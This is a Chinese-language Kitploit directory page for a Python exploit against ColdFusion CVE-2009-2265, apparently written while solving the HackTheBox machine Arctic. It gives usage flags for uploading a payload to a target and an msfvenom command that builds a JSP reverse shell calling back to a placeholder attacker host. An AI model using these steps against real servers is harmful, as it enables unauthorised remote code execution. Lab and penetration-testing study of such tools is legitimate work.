Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
zaphoxx-coldfusion — 基于 https://cvedetails.com/cve/CVE-2009-2265/ 的 ColdFusion 漏洞利用 | Kitploit
工具/GitHubGitHub/zaphoxx/zaphoxx-coldfusion
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试
GitHubzaphoxx/zaphoxx-coldfusion

zaphoxx-coldfusion

基于 https://cvedetails.com/cve/CVE-2009-2265/ 的 ColdFusion 漏洞利用

查看仓库
225年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

zaphoxx-coldfusion

基于 https://cvedetails.com/cve/CVE-2009-2265/ 的 coldfusion 漏洞利用

我为这个特定 CVE 编写 Python 脚本的主要原因是,在我试图解决 HTB 机器 Arctic 时,Metasploit 的同款利用模块对我不起作用。另外,稍微练习一下 Python 也不错。不过,还有一个由 Alexander Reid 最初编写的同款漏洞 Python 利用版本,如果你更愿意使用他的版本的话。

使用方法非常简单:

请确保你已创建好一个 payload 文件

例如,使用 msfvenom: msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp

用法:python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]

usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]

可选参数:

-h, --help 显示此帮助信息并退出

-t TARGET 目标 IP

-p PORT 目标端口

-f FILEPATH 要上传的 shellcode 文件路径

-b BASEPATH coldfusion 基础路径

下载工具